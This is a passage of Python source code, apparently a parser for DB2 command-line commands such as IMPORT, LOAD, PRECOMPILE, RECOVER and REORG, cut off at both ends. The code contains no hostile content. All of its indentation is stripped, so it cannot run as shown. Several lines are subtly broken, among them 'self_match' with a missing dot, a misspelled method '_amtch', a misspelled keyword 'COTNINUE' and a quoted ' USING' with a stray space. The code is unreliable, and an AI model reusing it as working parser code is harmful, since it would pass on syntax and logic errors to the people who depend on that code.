'APPLICATIONS',
'TABLES',
'TABLESPACES',
'LOCKS',
'BUFFERPOOLS',
'REMOTE_DATABASES',
'REMOTE_APPLICATIONS',
])
self._parse_db_partition_clause()
def _parse_import_method(self):
"""Parses the METHOD clause of an IMPORT/LOAD command"""
# METHOD already matched
if self._match('L'):
self._expect('(')
while True:
self._expect(TT.NUMBER) # col start
self._expect(TT.NUMBER) # col end
if not self._match(','):
break
self._expect(')')
if self._match('NULL'):
self._expect('INDICATORS')
self._expect('(')
self._parse_number_list()
self._expect(')')
elif self._match('N'):
self._expect('(')
self._parse_ident_list()
self._expect(')')
elif self._match('P'):
self._expect('(')
self._parse_number_list()
self._expect(')')
else:
self._expected_one_of(['L', 'N', 'P'])
def _parse_import_command(self):
"""Parses a IMPORT command"""
# IMPORT already matched
self._expect('FROM')
self.consumes.append((self._expect_clp_string().value, self.current_connection))
self._expect('OF')
self._expect_one_of(['ASC', 'DEL', 'IXF', 'WSF'])
if self._match('LOBS'):
self._expect('FROM')
self._parse_clp_string_list()
if self._match('XML'):
self._expect('FROM')
self._parse_clp_string_list()
if self._match('MODIFIED'):
self._expect('BY')
# See _parse_export_command() above for an explanation...
i = self._index
while True:
if self._token(i).value in [
'METHOD',
'COMMITCOUNT',
'RESTARTCOUNT',
'SKIPCOUNT',
'ROWCOUNT',
'WARNINGCOUNT',
'NOTIMEOUT',
'INSERT_UPDATE',
'REPLACE',
'REPLACE_CREATE',
'MESSAGES',
'INSERT',
'CREATE',
'ALLOW',
'XMLPARSE',
'XMLVALIDATE',
]:
while self._index < i:
self._output.append(self._token())
self._index += 1
break
if self._token(i).type == TT.EOF:
raise ParseError("Unable to find end of file-modifiers in IMPORT statement")
i += 1
if self._match('METHOD'):
self._parse_import_method()
if self._match('XMLPARSE'):
self._expect_one_of(['STRIP', 'PRESERVE'])
self._expect('WHITESPACE')
if self._match('XMLVALIDATE'):
self._expect('USING')
if self._match('XDS'):
if self._match('DEFAULT'):
self._parse_subschema_name()
if self._match('IGNORE'):
self._expect('(')
while True:
self._parse_subschema_name()
if not self._match(','):
break
self._expect(')')
if self._match('MAP'):
self._expect('(')
while True:
self._expect('(')
self._parse_subschema_name()
self._expect(',')
self._parse_subschema_name()
self._expect(')')
if not self._match(','):
break
self._expect(')')
elif self._match('SCHEMA'):
self._parse_subschema_name()
elif self._match('SCHEMALOCATION'):
self._expect('HINTS')
if self._match('ALLOW'):
self._expect_one_of(['NO', 'WRITE'])
self._expect('ACCESS')
if self._match('COMMITCOUNT'):
self._expect_one_of([TT.NUMBER, 'AUTOMATIC'])
if self._match_one_of(['RESTARTCOUNT', 'SKIPCOUNT']):
self._expect(TT.NUMBER)
if self._match('ROWCOUNT'):
self._expect(TT.NUMBER)
if self._match('WARNINGCOUNT'):
self._expect(TT.NUMBER)
if self._match('NOTIMEOUT'):
pass
if self._match('MESSAGES'):
self._expect_clp_string()
# Parse the action (CREATE/INSERT/etc.)
t = self._expect_one_of([
'CREATE',
'INSERT',
'INSERT_UPDATE',
'REPLACE',
'REPLACE_CREATE',
])
self._expect('INTO')
self._parse_table_name()
if self._match('('):
self._parse_ident_list()
self._expect(')')
if (t.value == 'CREATE') and self._match('IN'):
self._expect(TT.IDENTIFIER)
if self._match('INDEX'):
self._expect('IN')
self._expect(TT.IDENTIFIER)
if self._match('LONG'):
self._expect('IN')
self._expect(TT.IDENTIFIER)
def _parse_initialize_tape_command(self):
"""Parses an INTIALIZE TAPE command"""
# INITIALIZE TAPE already matched
if self._match('ON'):
self._expect_clp_string()
if self._match('USING'):
self._expect(TT.NUMBER)
def _parse_inspect_command(self):
"""Parses an INSPECT command"""
# INSPECT already matched
if self._match('ROWCOMPESTIMATE'):
self._expect('TABLE')
if self._match('NAME'):
self._expect(TT.IDENTIFIER)
if self._match('SCHEMA'):
self._expect(TT.IDENTIFIER)
elif self._match('TBSPACEID'):
self._expect_sequence([TT.NUMBER, 'OBJECTID', TT.NUMBER])
elif self._match('CHECK'):
if self._match('DATABASE'):
if self._match('BEGIN'):
self._expect_sequence(['TBSPACEID', TT.NUMBER])
self._match_sequence(['OBJECTID', TT.NUMBER])
elif self._match('TABLESPACE'):
if self._match('NAME'):
self._expect(TT.IDENTIFIER)
elif self._match('TBSPACEID'):
self._expect(TT.NUMBER)
if self._match('BEGIN'):
self._expect_sequence(['OBJECTID', TT.NUMBER])
if self._match('TABLE'):
if self._match('NAME'):
self._expect(TT.IDENTIFIER)
if self._match('SCHEMA'):
self._expect(TT.IDENTIFIER)
elif self._match('TBSPACEID'):
self._expect_sequence([TT.NUMBER, 'OBJECTID', TT.NUMBER])
else:
self._expected_one_of(['ROWCOMPESTIMATE', 'CHECK'])
self._match_sequence(['FOR', 'ERROR', 'STATE', 'ALL'])
if self._match_sequence(['LIMIT', 'ERROR', 'TO']):
self._expect_one_of(['DEFAULT', 'ALL', TT.NUMBER])
if self._match('EXTENTMAP'):
self._expect_one_of(['NORMAL', 'NONE', 'LOW'])
if self._match('DATA'):
self._expect_one_of(['NORMAL', 'NONE', 'LOW'])
if self._match('BLOCKMAP'):
self._expect_one_of(['NORMAL', 'NONE', 'LOW'])
if self._match('INDEX'):
self._expect_one_of(['NORMAL', 'NONE', 'LOW'])
if self._match('LONG'):
self._expect_one_of(['NORMAL', 'NONE', 'LOW'])
if self._match('LOB'):
self._expect_one_of(['NORMAL', 'NONE', 'LOW'])
if self._match('XML'):
self._expect_one_of(['NORMAL', 'NONE', 'LOW'])
self._match('INDEXDATA')
self._expect('RESULTS')
self._match('KEEP')
self._expect_clp_string()
self._parse_db_partitions_clause()
def _parse_instance_command(self):
"""Parses the custom (non-CLP) INSTANCE command"""
# INSTANCE already matched
self.current_instance = self._expect_clp_string().value
self.current_connection = None
def _parse_list_active_databases_command(self):
"""Parses a LIST ACTIVE DATABASES command"""
# LIST ACTIVE DATABASES already matched
self._parse_db_partition_clause()
def _parse_list_applications_command(self):
"""Parses a LIST APPLICATIONS command"""
# LIST APPLICATIONS already matched
if self._match('FOR'):
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
self._parse_db_partition_clause()
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_list_command_options_command(self):
"""Parses a LIST COMMAND OPTIONS command"""
# LIST COMMAND OPTIONS already matched
pass
def _parse_list_db_directory_command(self):
"""Parses a LIST DB DIRECTORY command"""
# LIST [DATABASE|DB] DIRECTORY already matched
if self._match('ON'):
self._expect_clp_string()
def _parse_list_database_partition_groups_command(self):
"""Parses a LIST DATABASE PARTITION GROUPS command"""
# LIST DATABASE PARTITION GROUPS already matched
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_list_nodes_command(self):
"""Parses a LIST NODES command"""
# LIST DBPARTITIONNUMS|NODES already matched
pass
def _parse_list_dcs_applications_command(self):
"""Parses a LIST DCS APPLICATIONS command"""
# LIST DCS APPLICATIONS already matched
if not self._match('EXTENDED'):
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_list_dcs_directory_command(self):
"""Parses a LIST DCS DIRECTORY command"""
# LIST DCS DIRECTORY already matched
pass
def _parse_list_drda_indoubt_transactions_command(self):
"""Parses a LIST DRDA INDOUBT TRANSACTIONS command"""
# LIST DRDA INDOUBT TRANSACTIONS already matched
self._match_sequence(['WITH', 'PROMPTING'])
def _parse_list_history_command(self):
"""Parses a LIST HISTORY command"""
# LIST HISTORY already matched
if self._match_one_of(['CREATE', 'ALTER', 'RENAME']):
self._expect('TABLESPACE')
elif self._match('ARCHIVE'):
self._expect('LOG')
elif self._match('DROPPED'):
self._expect('TABLE')
else:
self._match_one_of(['BACKUP', 'ROLLFORWARD', 'LOAD', 'REORG'])
if self._match('SINCE'):
self._expect(TT.NUMBER)
elif self._match('CONTAINING'):
self._parse_subschema_name()
elif not self._match('ALL'):
self._expected_one_of(['ALL', 'SINCE', 'CONTAINING'])
self._expect('FOR')
self._match_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
def _parse_list_indoubt_transactions_command(self):
"""Parses a LIST INDOUBT TRANSACTIONS command"""
# LIST INDOUBT TRANSACTIONS already matched
self._match_sequence(['WITH', 'PROMPTING'])
def _parse_list_node_directory_command(self):
"""Parses a LIST NODE DIRECTORY command"""
# LIST [ADMIN] NODE DIRECTORY already matched
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_list_odbc_data_sources_command(self):
"""Parses a LIST ODBC DATA SOURCES command"""
# LIST [USER|SYSTEM] ODBC DATA SOURCES already matched
pass
def _parse_list_tables_command(self):
"""Parses a LIST TABLES command"""
# LIST PACKAGES|TABLES already matched
if self._match('FOR'):
if self._match('SCHEMA'):
self._expect(TT.IDENTIFIER)
elif not self._match_one_of(['USER', 'SYSTEM', 'ALL']):
self._expected_one_of(['USER', 'SYSTEM', 'ALL', 'SCHEMA'])
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_list_tablespace_containers_command(self):
"""Parses a LIST TABLESPACE CONTAINERS command"""
# LIST TABLESPACE CONTAINERS already matched
self._expect_sequence(['FOR', TT.NUMBER])
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_list_tablespaces_command(self):
"""Parses a LIST TABLESPACES command"""
# LIST TABLESPACES already matched
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_list_utilities_command(self):
"""Parses a LIST UTILITIES command"""
# LIST UTILITIES already matched
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_load_command(self):
"""Parses a LOAD command"""
# LOAD already matched
self._match('CLIENT')
self._expect('FROM')
filename = self._expect_clp_string().value
self._expect('OF')
if self._expect_one_of(['ASC', 'DEL', 'IXF', 'CURSOR']).value != 'CURSOR':
self.consumes.append((filename, self.current_connection))
if self._match('LOBS'):
self._expect('FROM')
self._parse_clp_string_list()
if self._match('XML'):
self._expect('FROM')
self._parse_clp_string_list()
if self._match('MODIFIED'):
self._expect('BY')
# See _parse_export_command() above for an explanation...
i = self._index
while True:
if self._token(i)[1] in [
'INSERT',
'MESSAGES',
'METHOD',
'REPLACE',
'RESTART',
'ROWCOUNT',
'SAVECOUNT',
'TEMPFILES',
'TERMINATE',
'WARNINGCOUNT',
'XMLPARSE',
'XMLVALIDATE',
]:
while self._index < i:
self._output.append(self._token())
self._index += 1
break
if self._token(i).type == TT.EOF:
raise ParseError("Unable to find end of file-modifiers in LOAD statement")
i += 1
if self._match('METHOD'):
self._parse_import_method()
if self._match('XMLPARSE'):
self._expect_one_of(['STRIP', 'PRESERVE'])
self._expect('WHITESPACE')
if self._match('XMLVALIDATE'):
self._expect('USING')
if self._match('XDS'):
if self._match('DEFAULT'):
self._parse_subschema_name()
if self._match('IGNORE'):
self._expect('(')
while True:
self._parse_subschema_name()
if not self._match(','):
break
self._expect(')')
if self._match('MAP'):
self._expect('(')
while True:
self._expect('(')
self._parse_subschema_name()
self._expect(',')
self._parse_subschema_name()
self._expect(')')
if not self._match(','):
break
self._expect(')')
elif self._match('SCHEMA'):
self._parse_subschema_name()
elif self._match('SCHEMALOCATION'):
self._expect('HINTS')
if self._match('SAVECOUNT'):
self._expect(TT.NUMBER)
if self._match('ROWCOUNT'):
self._expect(TT.NUMBER)
if self._match('WARNINGCOUNT'):
self._expect(TT.NUMBER)
if self._match('MESSAGES'):
self._expect_clp_string()
if self._match('TEMPFILES'):
self._expect('PATH')
self._expect_clp_string()
if self._expect_one_of(['INSERT', 'RESTART', 'REPLACE', 'TERMINATE']).value == 'REPLACE':
self._match_one_of(['KEEPDICTIONARY', 'RESETDICTIONARY'])
self._expect('INTO')
self._parse_table_name()
if self._match('('):
self._parse_ident_list()
self._expect(')')
if self._match('FOR'):
self._expect('EXCEPTION')
self._parse_table_name()
if self._match_one_of(['NORANGEEXC', 'NOUNIQUEEXC']):
if self._match(','):
self._expect_one_of(['NORANGEEXC', 'NOUNIQUEEXC'])
if self._match('STATISTICS'):
if self._expect_one_of(['NO', 'USE']).value == 'USE':
self._expect('PROFILE')
if self._match('COPY'):
if self._expect_one_of(['NO', 'YES']).value == 'YES':
if self._match('USE'):
self._expect('TSM')
if self._match('OPEN'):
self._expect_sequence([TT.NUMBER, 'SESSIONS'])
elif self._match('TO'):
self._parse_clp_string_list()
elif self._match('LOAD'):
self._expect_clp_string()
if self._match('OPEN'):
self._expect_sequence([TT.NUMBER, 'SESSIONS'])
else:
self._expected_one_of(['USE', 'TO', 'LOAD'])
elif self._match('NONRECOVERABLE'):
pass
if self._match('WITHOUT'):
self._expect('PROMPTING')
if self._match('DATA'):
self._expect('BUFFER')
self._expect(TT.NUMBER)
if self._match('SORT'):
self._expect('BUFFER')
self._expect(TT.NUMBER)
if self._match('CPU_PARALLELISM'):
self._expect(TT.NUMBER)
if self._match('DISK_PARALLELISM'):
self._expect(TT.NUMBER)
if self._match('FETCH_PARALLELISM'):
self._expect_one_of(['YES', 'NO'])
if self._match('INDEXING'):
self._expect('MODE')
self._expect_one_of(['AUTOSELECT', 'REBUILD', 'INCREMENTAL', 'DEFERRED'])
if self._match('ALLOW'):
if self._match_sequence(['READ', 'ACCESS']):
self._match_sequence(['USE', TT.IDENTIFIER])
elif self._match_sequence(['NO', 'ACCESS']):
pass
else:
self._expected_one_of(['READ', 'NO'])
if self._match_sequence(['SET', 'INTEGRITY']):
self._expect_sequence(['PENDING', 'CASCADE'])
self._expect_one_of(['DEFERRED', 'IMMEDIATE'])
if self._match('LOCK'):
self._expect_sequence(['WITH', 'FORCE'])
if self._match('SOURCEUSEREXIT'):
self._expect_clp_string()
if self._match('REDIRECT'):
if self._match('INPUT'):
self._expect('FROM')
self._expect_one_of(['BUFFER', 'FILE'])
self._expect_clp_string()
if self._match('OUTPUT'):
self._expect_sequence(['TO', 'FILE'])
self._expect_clp_string()
self._match_sequence(['PARTITIONED', 'DB', 'CONFIG'])
while True:
if self._match('MODE'):
self._expect_one_of([
'PARTITION_AND_LOAD',
'PARTITION_ONLY',
'LOAD_ONLY',
'LOAD_ONLY_VERIFY_PART',
'ANALYZE',
])
elif self._match('ISOLATE_PART_ERRS'):
self._expect_one_of([
'SETUP_ERRS_ONLY',
'LOAD_ERRS_ONLY',
'SETUP_AND_LOAD_ERRS',
'NO_ISOLATION',
])
elif self._match_one_of(['PART_FILE_LOCATION', 'MAP_FILE_INPUT', 'MAP_FILE_OUTPUT', 'DISTFILE']):
self._expect_clp_string()
elif self._match_one_of(['OUTPUT_DBPARTNUMS', 'PARTITIONING_DBPARTNUMS']):
self._expect('(')
while True:
self._expect(TT.NUMBER)
if self._match('TO'):
self._expect(TT.NUMBER)
if not self._match(','):
break
self._expect(')')
elif self._match_one_of(['MAXIMUM_PART_AGENTS', 'STATUS_INTERVAL', 'TRACE', 'RUN_STAT_DBPARTNUM']):
self._expect(TT.NUMBER)
elif self._match('PORT_RANGE'):
self._expect_sequence(['(', TT.NUMBER, ',', TT.NUMBER, ')'])
elif self._match_one_of(['CHECK_TRUNCATION', 'NEWLINE', 'OMIT_HEADER']):
pass
else:
break
def _parse_load_query_command(self):
"""Parses a LOAD QUERY command"""
# LOAD QUERY already matched
self._expect('TABLE')
self._parse_table_name()
if self._match('TO'):
self._expect_clp_string()
self._match_one_of(['NOSUMMARY', 'SUMMARYONLY'])
self._match('SHOWDELTA')
def _parse_migrate_db_command(self):
"""Parses a MIGRATE DB command"""
# MIGRATE [DATABASE|DB] already matched
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
def _parse_on_command(self):
"""Parses the custom (non-CLP) ON SQLCODE|SQLSTATE|ERROR|REGEX command"""
# ON already matched
if self._match('SQLCODE'):
if self._match((TT.OPERATOR, '-')):
self._expect(TT.NUMBER)
else:
self._expect_one_of([TT.STRING, TT.NUMBER])
elif self._match('SQLSTATE'):
self._expect(TT.STRING)
elif self._match('ERROR'):
pass
elif self._match('REGEX'):
self._expect(TT.STRING)
else:
self._expected_one_of(['SQLCODE', 'SQLSTATE', 'ERROR', 'REGEX'])
wait = False
if self._match('WAIT'):
wait = True
self._expect(TT.NUMBER)
self._expect_one_of(['SECOND', 'SECONDS', 'MINUTE', 'MINUTES', 'HOUR', 'HOURS'])
self._match('AND')
retry = False
if self._match('RETRY'):
retry = True
self._expect_one_of(['STATEMENT', 'SCRIPT'])
if self._match(TT.NUMBER):
self._expect_one_of(['TIME', 'TIMES'])
self._match('THEN')
if wait and not retry:
self._expected('RETRY')
self._expect_one_of(['FAIL', 'STOP', 'CONTINUE', 'IGNORE'])
def _parse_ping_command(self):
"""Parses a PING command"""
# PING already matched
self._expect_clp_string()
if self._match('REQUEST'):
self._expect(TT.NUMBER)
if self._match('RESPONSE'):
self._expect(TT.NUMBER)
if self._match(TT.NUMBER):
self._match_one_of(['TIME', 'TIMES'])
def _parse_precompile_command(self):
"""Parses a PRECOMPILE command"""
# [PREP|PRECOMPILE] already matched
# XXX Can these parameters be specified in any order?
self._expect_clp_string()
if self._match('ACTION'):
if self._match_one_of(['ADD', 'REPLACE']).value == 'ADD':
pass
else:
if self._match('RETAIN'):
self._expect_one_of(['YES', 'NO'])
if self_match('REPLVER'):
self._expect_clp_string()
if self._match('APREUSE'):
self._expect_one_of(['YES', 'NO'])
if self._match('BINDFILE'):
if self._match('USING'):
self._expect_clp_string()
if self._match('BLOCKING'):
self._expect_one_of(['UNAMBIG', 'ALL', 'NO'])
if self._match('COLLECTION'):
self._expect(TT.IDENTIFIER)
if self._match('CALL_RESOLUTION'):
self._expect_one_of(['IMMEDIATE', 'DEFERRED'])
if self._match('CCSIDG'):
self._expect(TT.NUMBER)
if self._match('CCSIDM'):
self._expect(TT.NUMBER)
if self._match('CCSIDS'):
self._expect(TT.NUMBER)
if self._match('CHARSUB'):
self._expect_one_of(['DEFAULT', 'BIT', 'MIXED', 'SBCS'])
if self._match('CNULREQD'):
self._expect_one_of(['YES', 'NO'])
if self._match('COLLECTION'):
self._expect(TT.IDENTIFIER)
self._match_one_of(['COMPILE', 'PRECOMPILE'])
if self._match('CONCURRENTACCESSRESOLUTION'):
if self._expect_one_of(['USE', 'WAIT']).value == 'USE':
self._expect_sequence(['CURRENTLY', 'COMMITTED'])
else:
self._expect_sequence(['FOR', 'OUTCOME'])
if self._match('CONNECT'):
self._expect(TT.NUMBER)
if self._match('DATETIME'):
self._expect_one_of(['DEF', 'EUR', 'ISO', 'JIS', 'LOC', 'USA'])
if self._match('DBPROTOCOL'):
self._expect_one_of(['DRDA', 'PRIVATE'])
if self._match('DEC'):
self._expect(TT.NUMBER)
if self._match('DECDEL'):
self._expect_one_of(['PERIOD', 'COMMA'])
if self._match('DEFERRED_PREPARE'):
self._expect_one_of(['NO', 'ALL', 'YES'])
if self._match('DEGREE'):
self._expect_one_of([TT.NUMBER, 'ANY'])
if self._match('DISCONNECT'):
self._expect_one_of(['EXPLICIT', 'AUTOMATIC', 'CONDITIONAL'])
if self._match('DYNAMICRULES'):
self._expect_one_of(['RUN', 'BIND', 'INVOKERUN', 'INVOKEBIND', 'DEFINERUN', 'DEFINEBIND'])
if self._match('ENCODING'):
self._expect_one_of(['ASCII', 'EBCDIC', 'UNICODE', 'CCSID'])
if self._match('EXPLAIN'):
self._expect_one_of(['NO', 'ALL', 'ONLY', 'REOPT', 'YES'])
if self._match('EXPLSNAP'):
self._expect_one_of(['NO', 'ALL', 'REOPT', 'YES'])
if self._match('EXTENDEDINDICATOR'):
self._expect_one_of(['YES', 'NO'])
if self._match('FEDERATED'):
self._expect_one_of(['YES', 'NO'])
if self._match('FEDERATED_ASYNCHRONY'):
self._expect_one_of([TT.NUMBER, 'ANY'])
if self._match('FUNCPATH'):
self._parse_ident_list()
if self._match('GENERIC'):
self._expect_clp_string()
if self._amtch('IMMEDWRITE'):
self._expect_one_of(['NO', 'YES', 'PH1'])
if self._match('INSERT'):
self._expect_one_of(['DEF', 'BUF'])
if self._match('ISOLATION'):
self._expect_one_of(['CS', 'NC', 'RR', 'RS', 'UR'])
if self._match('KEEPDYNAMIC'):
self._expect_one_of(['YES', 'NO'])
if self._match('LANGLEVEL'):
self._expect_one_of(['SAA1', 'MIA', 'SQL92E'])
if self._match('LEVEL'):
self._expect(TT.IDENTIFIER)
if self._match('LONGERROR'):
self._expect_one_of(['YES', 'NO'])
if self._match('MESSAGES'):
self._expect_clp_string()
if self._match('NOLINEMACRO'):
pass
if self._match('OPTHINT'):
self._expect_clp_string()
if self._match('OPTLEVEL'):
self._expect(TT.NUMBER)
if self._match('OPTPROFILE'):
self._expect_clp_string()
if self._match('OS400NAMING'):
self._expect_one_of(['SYSTEM', 'SQL'])
if self._match('OUTPUT'):
self._expect_clp_string()
if self._match('OWNER'):
self._expect(TT.IDENTIFIER)
if self._match('PACKAGE'):
if self._match('USING'):
self._expect(TT.IDENTIFIER)
if self._match('PREPROCESSOR'):
self._expect_clp_string()
if self._match('QUALIFIER'):
self._expect(TT.IDENTIFIER)
if self._match('QUERYOPT'):
self._expect(TT.NUMBER)
if self._match('RELEASE'):
self._expect_one_of(['COMMIT', 'DEALLOCATE'])
if self._match('REOPT'):
self._expect_one_of(['NONE', 'ONCE', 'ALWAYS', 'VARS'])
if self._match_one_of(['REOPT', 'NOREOPT']):
self._expect('VARS')
if self._match('SQLCA'):
self._expect_one_of(['NONE', 'SAA'])
if self._match('SQLERROR'):
self._expect_one_of(['NOPACKAGE', 'CHECK', 'CONTINUE'])
if self._match('SQLFLAG'):
self._expect_one_of(['SQL92E', 'MVSDB2V23', 'MVSDB2V31', 'MVSDB2V41'])
self._expect('SYNTAX')
if self._match('SORTSEQ'):
self._expect_one_of(['JOBRUN', 'HEX'])
if self._match('SQLRULES'):
self._expect_one_of(['DB2', 'STD'])
if self._match('SQLWARN'):
self._expect_one_of(['YES', 'NO'])
if self._match('STATICREADONLY'):
self._expect_one_of(['YES', 'NO', 'INSENSITIVE'])
if self._match('STRDEL'):
self._expect_one_of(['APOSTROPHE', 'QUOTE'])
if self._match('SYNCPOINT'):
self._expect_one_of(['ONEPHASE', 'NONE', 'TWOPHASE'])
if self._match('SYNTAX'):
pass
if self._match('TARGET'):
self._expect_one_of(['IBMCOB', 'MFCOB', 'ANSI_COBOL', 'C', 'CPLUSPLUS', 'FORTRAN', 'BORLAND_C', 'BORLAND_CPLUSPLUS'])
if self._match('TEXT'):
self._expect_clp_string()
if self._match('TRANSFORM'):
self._expect('GROUP')
self._expect(TT.IDENTIFIER)
if self._match('VALIDATE'):
self._expect_one_of(['BIND', 'RUN'])
if self._match('WCHARTYPE'):
self._expect_one_of(['NOCONVERT', 'CONVERT'])
if self._match('VERSION'):
self._expect_clp_string()
def _parse_prune_history_command(self):
"""Parses a PRUNE HISTORY command"""
# PRUNE HISTORY already matched
self._expect(TT.NUMBER)
self._match_sequence(['WITH', 'FORCE', 'OPTION'])
self._match_sequence(['AND', 'DELETE'])
def _parse_prune_logfile_command(self):
"""Parses a PRUNE LOGFILE command"""
# PRUNT LOGFILE already matched
self._expect_sequence(['PRIOR', 'TO'])
self._expect_clp_string()
def _parse_put_routine_command(self):
"""Parses a PUT ROUTINE command"""
# PUT ROUTINE already matched
self._expect('FROM')
self._expect_clp_string()
if self._match('OWNER'):
self._expect(TT.IDENTIFIER)
self._match_sequence(['USE', 'REGISTERS'])
def _parse_query_client_command(self):
"""Parses a QUERY CLIENT command"""
# QUERY CLIENT already matched
pass
def _parse_quiesce_command(self):
"""Parses a QUIESCE DB / INSTANCE command"""
# QUIESCE already matched
if self._match('INSTANCE'):
self._expect_clp_string()
if self._match_one_of(['USER', 'GROUP']):
self._expect(TT.IDENTIFIER)
self._match_sequence(['RESTRICTED', 'ACCESS'])
elif self._match_one_of(['DATABASE', 'DB']):
pass
else:
self._expected_one_of(['DATABASE', 'DB', 'INSTANCE'])
if self._expect_one_of(['IMMEDIATE', 'DEFER'])[1] == 'DEFER':
if self._match('WITH'):
self._expect_sequence(['TIMEOUT', TT.NUMBER])
self._match_sequence(['FORCE', 'CONNECTIONS'])
def _parse_quiesce_tablespaces_command(self):
"""Parses a QUIESCE TABLESPACES command"""
# QUIESCE TABLESPACES already matched
self._expect_sequence(['FOR', 'TABLE'])
self._parse_table_name()
if self._expect_one_of(['SHARE', 'INTENT', 'EXCLUSIVE', 'RESET']).value == 'INTENT':
self._expect_sequence(['TO', 'UPDATE'])
def _parse_quit_command(self):
"""Parses a QUIT command"""
# QUIT already matched
pass
def _parse_rebind_command(self):
"""Parses a REBIND command"""
# REBIND already matched
self._match('PACKAGE')
self._parse_subschema_name()
if self._match('VERSION'):
self._expect_clp_string()
if self._match('APREUSE'):
self._expect_one_of(['YES', 'NO'])
if self._match('RESOLVE'):
self._expect_one_of(['ANY', 'CONSERVATIVE'])
if self._match('REOPT'):
self._expect_one_of(['NONE', 'ONCE', 'ALWAYS'])
def _parse_recover_db_command(self):
"""Parses a RECOVER DB command"""
# RECOVER [DATABASE|DB] already matched
self._expect_clp_string()
if self._match('TO'):
if self._match('END'):
self._expect_sequence(['OF', 'LOGS'])
self._parse_db_partitions_clause()
else:
self._expect_clp_string()
if self._match('USING'):
self._expect_one_of(['LOCAL', 'UTC'])
self._expect('TIME')
if self._match('ON'):
self._expect('ALL')
self._expect_one_of(['DBPARTITIONNUMS', 'NODES'])
self._parse_login(optional=True, allowchange=False)
if self._match('USING'):
self._expect_sequence(['HISTORY', 'FILE'])
self._expect('(')
self._expect_clp_string()
if self._match(','):
while True:
self._expect_clp_string()
self._expect('ON')
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect(TT.NUMBER)
if not self._match(','):
break
self._expect(')')
if self._match('OVERFLOW'):
self._expect_sequence(['LOG', 'PATH'])
self._expect('(')
self._expect_clp_string()
if self._match(','):
while True:
self._expect_clp_string()
self._expect('ON')
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect(TT.NUMBER)
if not self._match(','):
break
self._expect(')')
if self._match('COMPRLIB'):
self._expect_clp_string()
if self._match('COMPROPTS'):
self._expect_clp_string()
self._match('RESTART')
def _parse_redistribute_database_partition_group_command(self):
"""Parses a REDISTRIBUTE DATABASE PARTITION GROUP command"""
# REDISTRIBUTE DATABASE PARTITION GROUP already matched
self._expect_clp_string()
self._match_sequence(['NOT', 'ROLLFORWARD', 'RECOVERABLE'])
t = self._expect_one_of(['UNIFORM',' USING', 'COTNINUE', 'ABORT']).value
partitions = False
if t == 'USING':
if self._expect_one_of(['DISTFILE', 'TARGETMAP']).value == 'DISTFILE':
partitions = True
self._expect_clp_string()
elif t == 'UNIFORM':
partitions = True
if partitions:
if self._match('ADD'):
self._parse_db_partition_list_clause(size=False)
if self._match('DROP'):
self._parse_db_partition_list_clause(size=False)
if self._match('TABLE'):
self._expect('(')
while True:
self._parse_table_name()
if not self._match(','):
break
self._expect(')')
self._match_one_of(['ONCE', 'FIRST'])
if self._match('INDEXING'):
self._expect('MODE')
self._expect_one_of(['REBUILD', 'DEFERRED'])
elif self._match('DATA'):
self._expect('BUFFER')
self._expect(TT.NUMBER)
elif self._match('STATISTICS'):
if self._expect_one_of(['USE', 'NONE']).value == 'USE':
self._expect('PROFILE')
elif self._match('STOP'):
self._expect('AT')
self._expect_clp_string()
def _parse_refresh_ldap_command(self):
"""Parses a REFRESH LDAP command"""
# REFRESH LDAP already matched
if self._match('CLI'):
self._expect('CFG')
elif self._match_one_of(['DB', 'NODE']):
self._expect('DIR')
elif self._match('IMMEDIATE'):
self._match('ALL')
else:
self._expected_one_of(['CLI', 'DB', 'NODE', 'IMMEDIATE'])
def _parse_register_command(self):
"""Parses a REGISTER command"""
# REGISTER already matched
self._match_sequence(['DB2', 'SERVER'])
self._match('IN')
self._match('ADMIN')
self._expect('LDAP')
self._expect_one_of(['NODE', 'AS'])
self._expect_clp_string()
self._expect('PROTOCOL')
if self._expect_one_of(['TCPIP', 'TCPIP4', 'TCPIP6', 'NPIPE']).value != 'NPIPE':
if self._match('HOSTNAME'):
self._expect_clp_string()
if self._match('SVCENAME'):
self._expect_clp_string()
self._match_sequence(['SECURITY', 'SOCKS'])
if self._match('REMOTE'):
self._expect_clp_string()
if self._match('INSTANCE'):
self._expect_clp_string()
if self._match('NODETYPE'):
self._expect_one_of(['SERVER', 'MPP', 'DCS'])
if self._match('OSTYPE'):
self._expect_clp_string()
if self._match('WITH'):
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
def _parse_register_xmlschema_command(self):
"""Parses a REGISTER XMLSCHEMA command"""
# REGISTER XMLSCHEMA already matched
self._expect_clp_string()
self._expect('FROM')
self._expect_clp_string()
if self._match('WITH'):
self._expect_clp_string()
if self._match('AS'):
self._parse_subschema_name()
if self._match('('):
while True:
self._expect('ADD')
self._expect_clp_string()
self._expect('FROM')
self._expect_clp_string()
if self._match('WITH'):
self._expect_clp_string()
if self._match(')'):
break
if self._match('COMPLETE'):
if self._match('WITH'):
self._expect_clp_string()
if self._match('ENABLE'):
self._expect('DECOMPOSITION')
def _parse_register_xsrobject_command(self):
"""Parses a REGISTER XSROBJECT command"""
# REGISTER XSROBJECT already matched
self._expect_clp_string()
if self._match('PUBLIC'):
self._expect_clp_string()
self._expect('FROM')
self._expect_clp_string()
if self._match('AS'):
self._parse_subschema_name()
if self._match('EXTERNAL'):
self._expect('ENTITY')
else:
self._expect_one_of(['DTD', 'EXTERNAL'])
def _parse_reorg_command(self):
"""Parses a REORG command"""
def parse_table_clause():
if self._match('INDEX'):
self._parse_index_name()
if self._match('INPLACE'):
if not self._match_one_of(['STOP', 'PAUSE']):
if self._match('ALLOW'):
self._expect_one_of(['READ', 'WRITE'])
self._expect('ACCESS')
if self._match('NOTRUNCATE'):
self._expect('TABLE')
self._match_one_of(['START', 'RESUME'])
else:
if self._match('ALLOW'):
self._expect_one_of(['READ', 'NO'])
self._expect('ACCESS')
if self._match('USE'):
self._expect(TT.IDENTIFIER)
